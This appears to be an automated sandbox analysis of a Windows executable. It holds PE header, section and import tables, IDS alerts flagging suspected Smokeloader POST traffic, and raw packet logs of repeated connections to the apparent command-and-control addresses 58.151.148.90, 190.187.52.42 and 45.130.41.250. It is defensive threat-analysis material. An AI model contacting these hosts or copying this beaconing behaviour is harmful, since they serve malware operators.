                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x28a7c0x3c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d0000xa138.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x270000x198.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x25d0c0x25e00b91f6c3e08c9da7e1278e74784c8e531False0.5483382322607261data5.857568734649549IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x270000x23a00x2400e86ec2cfd30a7a88c3cddd6e7f366398False0.3825954861111111data5.582207049351834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x2a0000x1267c0x220024dd15728c5f7e055bc300090138fcc6False0.18956801470588236data2.0612611945466455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x3d0000xa1380xa2006683b0dab82fa07587961b15ec5d6eb6False0.37635030864197533data4.5164695591334265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_CURSOR0x42c400x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                          RT_CURSOR0x42d880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                          RT_CURSOR0x42eb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                          RT_CURSOR0x454880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                          RT_ICON0x3d4c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.363272921108742
                          RT_ICON0x3e3680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5685920577617328
                          RT_ICON0x3ec100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6203917050691244
                          RT_ICON0x3f2d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6640173410404624
                          RT_ICON0x3f8400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4324688796680498
                          RT_ICON0x41de80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5319672131147541
                          RT_ICON0x427700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5168439716312057
                          RT_STRING0x465280x66data0.6274509803921569
                          RT_STRING0x465900x1fcdata0.5039370078740157
                          RT_STRING0x467900x608data0.43976683937823835
                          RT_STRING0x46d980x14edata0.5059880239520959
                          RT_STRING0x46ee80x1bcdata0.5247747747747747
                          RT_STRING0x470a80x90data0.6388888888888888
                          RT_GROUP_CURSOR0x42d700x14data1.15
                          RT_GROUP_CURSOR0x454600x22data1.088235294117647
                          RT_GROUP_CURSOR0x463300x14data1.25
                          RT_GROUP_ICON0x42bd80x68dataTurkishTurkey0.7115384615384616
                          RT_VERSION0x463480x1e0data0.5833333333333334
                          DLLImport
                          KERNEL32.dllGetFullPathNameW, GlobalDeleteAtom, OpenJobObjectA, GetLogicalDriveStringsW, GetSystemWindowsDirectoryW, GetCommProperties, GetModuleHandleW, GetTickCount, GetCommandLineA, GetSystemTimes, GlobalAlloc, Sleep, FormatMessageW, DeleteVolumeMountPointW, HeapCreate, WriteConsoleW, VirtualUnlock, FlushInstructionCache, GetShortPathNameA, InterlockedExchange, GetProcAddress, SearchPathA, GetNumaHighestNodeNumber, OpenWaitableTimerA, GetAtomNameA, LoadLibraryA, SetCalendarInfoW, HeapLock, GetCurrentConsoleFont, SetCommMask, FoldStringW, GetDefaultCommConfigA, lstrcatW, FreeEnvironmentStringsW, EnumDateFormatsW, SetFileShortNameA, DebugBreak, GetLastError, HeapFree, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, ReadFile, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle, GetModuleHandleA
                          USER32.dllGetActiveWindow, IntersectRect
                          Language of compilation systemCountry where language is spokenMap
                          TurkishTurkey
                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                          2024-08-06T14:48:56.016106+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975280192.168.2.458.151.148.90
                          2024-08-06T14:48:30.928546+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973880192.168.2.458.151.148.90
                          2024-08-06T14:48:41.821298+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974480192.168.2.458.151.148.90
                          2024-08-06T14:51:34.618408+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977480192.168.2.4190.187.52.42
                          2024-08-06T14:51:04.254415+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976880192.168.2.4190.187.52.42
                          2024-08-06T14:50:20.438920+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976080192.168.2.458.151.148.90
                          2024-08-06T14:51:14.829048+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977080192.168.2.4190.187.52.42
                          2024-08-06T14:48:37.059237+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974280192.168.2.458.151.148.90
                          2024-08-06T14:50:14.241484+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975980192.168.2.458.151.148.90
                          2024-08-06T14:48:35.534785+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974180192.168.2.458.151.148.90
                          2024-08-06T14:51:50.453126+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977780192.168.2.4190.187.52.42
                          2024-08-06T14:48:39.509615+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974380192.168.2.458.151.148.90
                          2024-08-06T14:48:27.855659+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973680192.168.2.458.151.148.90
                          2024-08-06T14:50:41.269726+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976480192.168.2.458.151.148.90
                          2024-08-06T14:49:04.206062+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975680192.168.2.458.151.148.90
                          2024-08-06T14:48:50.165626+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974980192.168.2.458.151.148.90
                          2024-08-06T14:50:46.436979+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976580192.168.2.458.151.148.90
                          2024-08-06T14:51:45.563822+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977680192.168.2.4190.187.52.42
                          2024-08-06T14:52:00.583525+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977980192.168.2.4190.187.52.42
                          2024-08-06T14:50:59.094118+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976780192.168.2.4190.187.52.42
                          2024-08-06T14:48:43.293459+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974580192.168.2.458.151.148.90
                          2024-08-06T14:51:55.337366+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977880192.168.2.4190.187.52.42
                          2024-08-06T14:50:36.064848+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976380192.168.2.458.151.148.90
                          2024-08-06T14:51:29.791538+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977380192.168.2.4190.187.52.42
                          2024-08-06T14:49:02.392745+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975580192.168.2.458.151.148.90
                          2024-08-06T14:50:25.754267+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976180192.168.2.458.151.148.90
                          2024-08-06T14:48:46.441446+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974780192.168.2.458.151.148.90
                          2024-08-06T14:50:30.907851+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976280192.168.2.458.151.148.90
                          2024-08-06T14:50:51.717674+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976680192.168.2.458.151.148.90
                          2024-08-06T14:48:29.414572+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973780192.168.2.458.151.148.90
                          2024-08-06T14:51:40.131887+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977580192.168.2.4190.187.52.42
                          2024-08-06T14:48:33.946645+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974080192.168.2.458.151.148.90
                          2024-08-06T14:48:44.854879+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974680192.168.2.458.151.148.90
                          2024-08-06T14:51:19.867733+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977180192.168.2.4190.187.52.42
                          2024-08-06T14:51:09.566965+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976980192.168.2.4190.187.52.42
                          2024-08-06T14:51:24.926341+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977280192.168.2.4190.187.52.42
                          2024-08-06T14:48:32.419301+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973980192.168.2.458.151.148.90
                          2024-08-06T14:48:48.380629+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974880192.168.2.458.151.148.90
                          2024-08-06T14:48:57.595341+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975380192.168.2.458.151.148.90
                          TimestampSource PortDest PortSource IPDest IP
                          Aug 6, 2024 14:48:26.048444033 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:26.053780079 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:26.054649115 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:26.054833889 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:26.054867029 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:26.059715033 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:26.059762001 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.855571032 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.855593920 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.855659008 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.855915070 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.855952024 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.856673002 CEST4973680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.859648943 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.861808062 CEST804973658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.864594936 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.864706993 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.864784956 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.864795923 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:27.869937897 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:27.869946957 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.413307905 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.414503098 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.414572001 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.414609909 CEST4973780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.416954041 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.420717955 CEST804973758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.421792984 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.421875000 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.421967983 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.422071934 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:29.426841021 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:29.427408934 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.928253889 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.928488970 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.928545952 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.928586960 CEST4973880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.930818081 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.933640003 CEST804973858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.935667992 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.935744047 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.935853004 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.935872078 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:30.940854073 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:30.940866947 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.419202089 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.419225931 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.419301033 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.419466972 CEST4973980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.422216892 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.424223900 CEST804973958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.427165985 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.427226067 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.427371979 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.427392960 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:32.432363033 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:32.433013916 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.946558952 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.946580887 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.946645021 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.946789026 CEST4974080192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.949594975 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.953668118 CEST804974058.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.954580069 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.954672098 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.954813957 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.954848051 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:33.960588932 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:33.960654974 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.534559965 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.534679890 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.534785032 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.534890890 CEST4974180192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.537544966 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.539783001 CEST804974158.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.543227911 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.543380976 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.543487072 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.543487072 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:35.549778938 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:35.550527096 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.059124947 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.059163094 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.059237003 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.059437990 CEST4974280192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.062586069 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.064827919 CEST804974258.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.067516088 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.067569017 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.067718983 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.067754984 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:37.072650909 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:37.072664022 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.509258032 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.509464979 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.509614944 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.510396957 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.512150049 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.515268087 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.517013073 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.517124891 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.517291069 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.517313004 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.522280931 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.522794962 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.820534945 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.821219921 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.821297884 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.821331978 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.824058056 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.827687979 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.830267906 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.830355883 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.830480099 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.830612898 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.835875988 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.835889101 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.292944908 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.293409109 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.293458939 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.293504000 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.298650026 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.301692009 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306659937 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.306761026 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306885958 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306912899 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.311724901 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.311989069 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854724884 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854823112 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854878902 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.855010033 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.857795954 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.859831095 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.862808943 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.862900019 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.863045931 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.863070965 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.868323088 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.869019032 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.439511061 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.441314936 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.441446066 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.441446066 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.444863081 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.448590994 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.450165033 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.450275898 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.450459003 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.450483084 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:46.455292940 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:46.455899954 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.379570007 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.380538940 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.380629063 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.380671024 CEST4974880192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.383194923 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.385518074 CEST804974858.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.388052940 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.388113976 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.388230085 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.388256073 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:48.393088102 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:48.393199921 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:50.165376902 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:50.165397882 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:50.165626049 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:50.165626049 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:50.165648937 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:50.165853977 CEST4974980192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:50.172220945 CEST804974958.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:50.618215084 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:50.618290901 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:50.618381023 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:50.618757963 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:50.618793964 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.360086918 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.360200882 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.361737967 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.361748934 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.361998081 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.381318092 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.424520016 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.843405962 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.843432903 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.843466997 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.843581915 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.843581915 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.843610048 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.843662024 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.844280005 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.844302893 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.844360113 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:51.844367981 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:51.893151999 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.004878044 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.004904032 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.004981041 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.004997969 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.005040884 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.005330086 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.005352020 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.005388021 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.005393982 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.005419016 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.005435944 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.006176949 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.006190062 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.006249905 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.006258011 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.006294012 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.013334036 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.013348103 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.013433933 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.013441086 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.013477087 CEST49751443192.168.2.445.130.41.250
                          Aug 6, 2024 14:48:52.103034973 CEST4434975145.130.41.250192.168.2.4
                          Aug 6, 2024 14:48:52.103050947 CEST4434975145.130.41.250192.168.2.4
